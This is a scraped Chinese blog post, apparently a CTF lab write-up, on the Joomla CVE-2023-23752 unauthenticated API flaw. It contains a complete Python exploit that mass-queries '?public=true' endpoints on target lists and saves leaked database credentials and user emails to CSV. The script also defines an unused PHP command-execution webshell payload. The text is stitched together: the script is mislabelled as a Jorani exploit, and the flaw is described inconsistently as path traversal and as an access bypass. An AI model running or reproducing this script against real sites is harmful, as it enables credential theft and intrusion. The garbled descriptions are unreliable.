当前位置: 首页 > news >正文

网站建设方案书微商城app和网站开发人员工作职责

网站建设方案书微商城,app和网站开发人员工作职责,手机网站大全1,wordpress 用户头像目录 CVE-2023-23752漏洞细节漏洞利用示例修复建议 春秋云镜#xff1a;解法一#xff1a;解法二#xff1a; CVE-2023-23752 是一个影响 Joomla CMS 的未授权路径遍历漏洞。该漏洞出现在 Joomla 4.0.0 至 4.2.7 版本中#xff0c;允许未经认证的远程攻击者通过特定 API 端… 目录 CVE-2023-23752漏洞细节漏洞利用示例修复建议 春秋云镜解法一解法二 CVE-2023-23752 是一个影响 Joomla CMS 的未授权路径遍历漏洞。该漏洞出现在 Joomla 4.0.0 至 4.2.7 版本中允许未经认证的远程攻击者通过特定 API 端点读取服务器上的敏感文件包括配置文件等这可能会导致服务器上的敏感信息泄露和进一步的攻击。 漏洞细节 漏洞编号CVE-2023-23752影响版本Joomla 4.0.0 至 4.2.7漏洞类型路径遍历 (Directory Traversal)访问要求无需身份验证即可访问利用条件通过指定的 API 端点结合路径遍历参数访问系统文件 攻击者通过利用路径遍历技巧向 Joomla 的 API 端点发送特定请求可以直接访问和读取 Joomla 服务器的敏感文件如 configuration.php 文件其中可能包含数据库凭据、加密密钥等关键信息。 漏洞利用示例 攻击者可以通过如下请求来尝试获取配置文件内容 GET /api/index.php/v1/config/application?path../../configuration.php HTTP/1.1 Host: target-site.com 在 path 参数中使用路径遍历如 …/…/可绕过文件路径限制并访问 Joomla 安装路径外的文件。通过请求配置文件攻击者能够获取服务器的数据库连接信息、加密密钥等敏感数据。 修复建议 Joomla 已在 4.2.8 版本中修复了该漏洞。建议用户尽快采取以下措施 升级 Joomla 版本将 Joomla CMS 升级至 4.2.8 或更高版本。限制 API 访问在服务器设置中对 /api/index.php 端点进行访问限制以避免未经授权的访问。启用 Web 应用防火墙WAFWAF 可帮助过滤和阻止包含路径遍历特征的恶意请求。 春秋云镜 Joomla是一个开源免费的内容管理系统CMS基于PHP开发。在其4.0.0版本到4.2.7版本中存在一处属性覆盖漏洞导致攻击者可以通过恶意请求绕过权限检查访问任意Rest API。 解法一 直接利用脚本 CVE-2023-23752 利用Jorani 1.0.0 中的路径遍历与日志注入漏洞 该漏洞允许攻击者通过路径遍历访问日志文件并注入恶意代码从而执行远程命令。 import requests import argparse import csv import json import datetime import sys import re import base64 import random import string# 禁用 SSL 不安全请求的警告 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)# 定义日志输出的函数带有颜色显示 def inGreen(s):return \033[0;32m{}\033[0m.format(s)def inYellow(s):return \033[0;33m{}\033[0m.format(s)# 定义日志、错误和消息输出函数 def msg(x, y\n):print(f\x1b[92m[]\x1b[0m {x}, endy)def err(x, y\n):print(f\x1b[91m[x]\x1b[0m {x}, endy)def log(x, y\n):print(f\x1b[93m[?]\x1b[0m {x}, endy)# 正则表达式用于提取 CSRF 令牌和命令执行结果 CSRF_PATTERN re.compile(input typehidden namecsrf_test_jorani value(.*?)) CMD_PATTERN re.compile(---------(.*?)---------, re.S)# 定义 API 路径映射 URLS {login: /session/login,view: /pages/view/, }# 随机生成一个头字段名以绕过某些防护机制 HEADER_NAME .join(random.choice(string.ascii_uppercase) for _ in range(12))# 定义用于绕过重定向保护的请求头 BypassRedirect {X-REQUESTED-WITH: XMLHttpRequest,HEADER_NAME: }# 定义伪终端输入的提示符样式 INPUT \x1b[92muser\x1b[0m\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ # 简化 URL 构造的函数 u lambda base_url, path_key: base_url URLS[path_key]# 注入的恶意 PHP 代码和路径遍历 payload POISON_PAYLOAD f?php if(isset($_SERVER[HTTP_{HEADER_NAME}])){{system(base64_decode($_SERVER[HTTP_{HEADER_NAME}]));}} ? PATH_TRAV_PAYLOAD ../../application/logs# 全局变量用于存储输出文件路径、代理设置和是否禁用颜色输出 output proxy {} notColor False timeout 10 # 添加这行设置请求超时时间为10秒def readFile(filepath):读取文件内容返回每行数据的列表try:with open(filepath, encodingutf8) as file:return file.readlines()except Exception as e:err(f读取文件失败: {e})sys.exit(1)def writeFile(filepath, data):将数据写入 CSV 文件try:with open(filepath, a, encodingutf8, newline) as file:filecsv csv.writer(file)filecsv.writerow(data)except Exception as e:err(f写入文件失败: {e})def reqDatabase(url):请求数据库配置信息并提取用户名和密码# 构造请求 URLif url.endswith(/):api_url f{url}api/index.php/v1/config/application?publictrueelse:api_url f{url}/api/index.php/v1/config/application?publictrue# 定义请求头headers {Upgrade-Insecure-Requests: 1,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36,Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9,Accept-Encoding: gzip, deflate,Accept-Language: zh-CN,zh;q0.9,Connection: close}try:# 发送 GET 请求response requests.get(api_url, headersheaders, verifyFalse, proxiesproxy, timeouttimeout)# 检查响应内容是否包含用户和密码信息if links in response.text and \password\: in response.text:try:rejson response.json()user password for dataone in rejson[data]:attributes dataone.get(attributes, {})user attributes.get(user, )password attributes.get(password, )if user or password:printBody f[] [Database] {url} -- {user} / {password}if notColor:print(printBody)else:print(inYellow(printBody))if output.strip():writeFile(f{output}_databaseUserAndPassword.csv, [url, user, password, response.text])return url, response.textexcept json.JSONDecodeError:err(解析 JSON 失败)except requests.RequestException as e:err(f请求数据库信息失败: {e})def reqUserAndEmail(url):请求用户和邮箱信息并提取用户名和邮箱# 构造请求 URLif url.endswith(/):api_url f{url}api/index.php/v1/users?publictrueelse:api_url f{url}/api/index.php/v1/users?publictrue# 定义请求头headers {Upgrade-Insecure-Requests: 1,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36,Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9,Accept-Encoding: gzip, deflate,Accept-Language: zh-CN,zh;q0.9,Connection: close}try:# 发送 GET 请求response requests.get(api_url, headersheaders, verifyFalse, proxiesproxy, timeouttimeout)# 检查响应内容是否包含用户名和邮箱信息if username in response.text and email in response.text:try:rejson response.json()for dataone in rejson[data]:attributes dataone.get(attributes, {})username attributes.get(username, )email attributes.get(email, )if username or email:printBody f[] [Useremail] {url} -- {username} / {email}if notColor:print(printBody)else:print(inGreen(printBody))if output.strip():writeFile(f{output}_usernameAndEmail.csv, [url, username, email, response.text])return url, response.textexcept json.JSONDecodeError:err(解析 JSON 失败)except requests.RequestException as e:err(f请求用户和邮箱信息失败: {e})def reqs(listfileName):读取 URL 列表并依次执行数据库和用户信息请求urls readFile(listfileName)for url in urls:url url.strip()if not url:continuereqDatabase(url)reqUserAndEmail(url)def main():主函数解析命令行参数并执行相应操作parser argparse.ArgumentParser(descriptionJorani 1.0.0 CVE-2023-23752 漏洞利用脚本)parser.add_argument(-u, --url, typestr, default, help单个测试目标的 URL)parser.add_argument(-l, --listfile, typestr, default, help包含测试目标 URL 的文件)parser.add_argument(-o, --output, typestr, default, help输出文件的位置不带扩展名)parser.add_argument(-p, --proxy, typestr, default, help代理地址例如http://localhost:1080)parser.add_argument(-nc, --notColor, actionstore_true, help禁用带颜色的输出)opt parser.parse_args()args vars(opt)url args[url]urlFileName args[listfile]global output, proxy, notColoroutput args[output]if args[proxy]:proxy[http] args[proxy]proxy[https] args[proxy]notColor args[notColor]if url:reqDatabase(url)reqUserAndEmail(url)if urlFileName:reqs(urlFileName)if __name__ __main__:main() flag{631f8b58-cbda-473d-a969-5160c11977be}解法二 其本身可利用的api接口 v1/banners v1/banners/:id v1/banners v1/banners/:id v1/banners/:id v1/banners/clients v1/banners/clients/:id v1/banners/clients v1/banners/clients/:id v1/banners/clients/:id v1/banners/categories v1/banners/categories/:id v1/banners/categories v1/banners/categories/:id v1/banners/categories/:id v1/banners/:id/contenthistory v1/banners/:id/contenthistory/keep v1/banners/:id/contenthistory v1/config/application v1/config/application v1/config/:component_name v1/config/:component_name v1/contacts/form/:id v1/contacts v1/contacts/:id v1/contacts v1/contacts/:id v1/contacts/:id v1/contacts/categories v1/contacts/categories/:id v1/contacts/categories v1/contacts/categories/:id v1/contacts/categories/:id v1/fields/contacts/contact v1/fields/contacts/contact/:id v1/fields/contacts/contact v1/fields/contacts/contact/:id v1/fields/contacts/contact/:id v1/fields/contacts/mail v1/fields/contacts/mail/:id v1/fields/contacts/mail v1/fields/contacts/mail/:id v1/fields/contacts/mail/:id v1/fields/contacts/categories v1/fields/contacts/categories/:id v1/fields/contacts/categories v1/fields/contacts/categories/:id v1/fields/contacts/categories/:id v1/fields/groups/contacts/contact v1/fields/groups/contacts/contact/:id v1/fields/groups/contacts/contact v1/fields/groups/contacts/contact/:id v1/fields/groups/contacts/contact/:id v1/fields/groups/contacts/mail v1/fields/groups/contacts/mail/:id v1/fields/groups/contacts/mail v1/fields/groups/contacts/mail/:id v1/fields/groups/contacts/mail/:id v1/fields/groups/contacts/categories v1/fields/groups/contacts/categories/:id v1/fields/groups/contacts/categories v1/fields/groups/contacts/categories/:id v1/fields/groups/contacts/categories/:id v1/contacts/:id/contenthistory v1/contacts/:id/contenthistory/keep v1/contacts/:id/contenthistory v1/content/articles v1/content/articles/:id v1/content/articles v1/content/articles/:id v1/content/articles/:id v1/content/categories v1/content/categories/:id v1/content/categories v1/content/categories/:id v1/content/categories/:id v1/fields/content/articles v1/fields/content/articles/:id v1/fields/content/articles v1/fields/content/articles/:id v1/fields/content/articles/:id v1/fields/content/categories v1/fields/content/categories/:id v1/fields/content/categories v1/fields/content/categories/:id v1/fields/content/categories/:id v1/fields/groups/content/articles v1/fields/groups/content/articles/:id v1/fields/groups/content/articles v1/fields/groups/content/articles/:id v1/fields/groups/content/articles/:id v1/fields/groups/content/categories v1/fields/groups/content/categories/:id v1/fields/groups/content/categories v1/fields/groups/content/categories/:id v1/fields/groups/content/categories/:id v1/content/articles/:id/contenthistory v1/content/articles/:id/contenthistory/keep v1/content/articles/:id/contenthistory v1/extensions v1/languages/content v1/languages/content/:id v1/languages/content v1/languages/content/:id v1/languages/content/:id v1/languages/overrides/search v1/languages/overrides/search/cache/refresh v1/languages/overrides/site/zh-CN v1/languages/overrides/site/zh-CN/:id v1/languages/overrides/site/zh-CN v1/languages/overrides/site/zh-CN/:id v1/languages/overrides/site/zh-CN/:id v1/languages/overrides/administrator/zh-CN v1/languages/overrides/administrator/zh-CN/:id v1/languages/overrides/administrator/zh-CN v1/languages/overrides/administrator/zh-CN/:id v1/languages/overrides/administrator/zh-CN/:id v1/languages/overrides/site/en-GB v1/languages/overrides/site/en-GB/:id v1/languages/overrides/site/en-GB v1/languages/overrides/site/en-GB/:id v1/languages/overrides/site/en-GB/:id v1/languages/overrides/administrator/en-GB v1/languages/overrides/administrator/en-GB/:id v1/languages/overrides/administrator/en-GB v1/languages/overrides/administrator/en-GB/:id v1/languages/overrides/administrator/en-GB/:id v1/languages v1/languages v1/media/adapters v1/media/adapters/:id v1/media/files v1/media/files/:path/ v1/media/files/:path v1/media/files v1/media/files/:path v1/media/files/:path v1/menus/site v1/menus/site/:id v1/menus/site v1/menus/site/:id v1/menus/site/:id v1/menus/administrator v1/menus/administrator/:id v1/menus/administrator v1/menus/administrator/:id v1/menus/administrator/:id v1/menus/site/items v1/menus/site/items/:id v1/menus/site/items v1/menus/site/items/:id v1/menus/site/items/:id v1/menus/administrator/items v1/menus/administrator/items/:id v1/menus/administrator/items v1/menus/administrator/items/:id v1/menus/administrator/items/:id v1/menus/site/items/types v1/menus/administrator/items/types v1/messages v1/messages/:id v1/messages v1/messages/:id v1/messages/:id v1/modules/types/site v1/modules/types/administrator v1/modules/site v1/modules/site/:id v1/modules/site v1/modules/site/:id v1/modules/site/:id v1/modules/administrator v1/modules/administrator/:id v1/modules/administrator v1/modules/administrator/:id v1/modules/administrator/:id v1/newsfeeds/feeds v1/newsfeeds/feeds/:id v1/newsfeeds/feeds v1/newsfeeds/feeds/:id v1/newsfeeds/feeds/:id v1/newsfeeds/categories v1/newsfeeds/categories/:id v1/newsfeeds/categories v1/newsfeeds/categories/:id v1/newsfeeds/categories/:id v1/plugins v1/plugins/:id v1/plugins/:id v1/privacy/requests v1/privacy/requests/:id v1/privacy/requests/export/:id v1/privacy/requests v1/privacy/consents v1/privacy/consents/:id v1/privacy/consents/:id v1/redirects v1/redirects/:id v1/redirects v1/redirects/:id v1/redirects/:id v1/tags v1/tags/:id v1/tags v1/tags/:id v1/tags/:id v1/templates/styles/site v1/templates/styles/site/:id v1/templates/styles/site v1/templates/styles/site/:id v1/templates/styles/site/:id v1/templates/styles/administrator v1/templates/styles/administrator/:id v1/templates/styles/administrator v1/templates/styles/administrator/:id v1/templates/styles/administrator/:id v1/users v1/users/:id v1/users v1/users/:id v1/users/:id v1/fields/users v1/fields/users/:id v1/fields/users v1/fields/users/:id v1/fields/users/:id v1/fields/groups/users v1/fields/groups/users/:id v1/fields/groups/users v1/fields/groups/users/:id v1/fields/groups/users/:id v1/users/groups v1/users/groups/:id v1/users/groups v1/users/groups/:id v1/users/groups/:id v1/users/levels v1/users/levels/:id v1/users/levels v1/users/levels/:id v1/users/levels/:id /api/index.php/v1/config/application?publictrue这里存在的是数据库信息没有看到有flag /api/index.php/v1/users?publictrue查看用户信息找到flag
http://www.w-s-a.com/news/154460/

相关文章:

  • 曲阜网站建设百度开户现货黄金什么网站可以做直播
  • 比较好的企业建站平台小程序开发外包该注意些什么
  • 建行官网官网网站吗二次元风格wordpress模板
  • 怎样开通自己的网站网址导航哪个主页最好
  • 大良o2o网站建设详情页设计说明怎么写
  • 您与此网站之间建立的连接不安全汽车cms系统是什么意思
  • 有没有做logo的网站企业网站的内容营销
  • 哈尔滨做企业网站怎么做网站自动响应
  • 网站建设硬件和软件技术环境配置签约做网站模板
  • 教育网站建设的素材手机app制作流程
  • 免费行情软件网站大全下载网站备案查询
  • flex网站模板wordpress实时预览
  • 建设银行网站模板为什么企业要建设自己的企业文化
  • 网站建设必知免费手机网站建站系统
  • ssh可以做wap网站么嘉兴seo排名
  • 站内优化包括哪些帝国做企业网站
  • 做网站seo赚钱吗网络维护和故障维修
  • 企业网站可以自己做摄影网站开发背景怎么写
  • 网站百度指数seo最好的工具
  • 宝安专业网站建设推荐设计感强的网站
  • 网站建设 6万元北京知名的品牌设计公司
  • 网站建设的总体需求是什么vmware 下wordpress
  • 光谷网站建设请检查网络
  • 申请建设网站的报告书商务网站开发课程体会
  • 网站开发实训总结致谢群晖wordpress设置
  • 关于酒店网站建设的摘要天津市建设工程信息网官网首页
  • 网站alexa排名查询手机网站制作器
  • 建设小辣猫的网站电子毕业设计网站建设
  • 询广西南宁网站运营礼品定制
  • 建筑公司网站作用免费查看招标信息的网站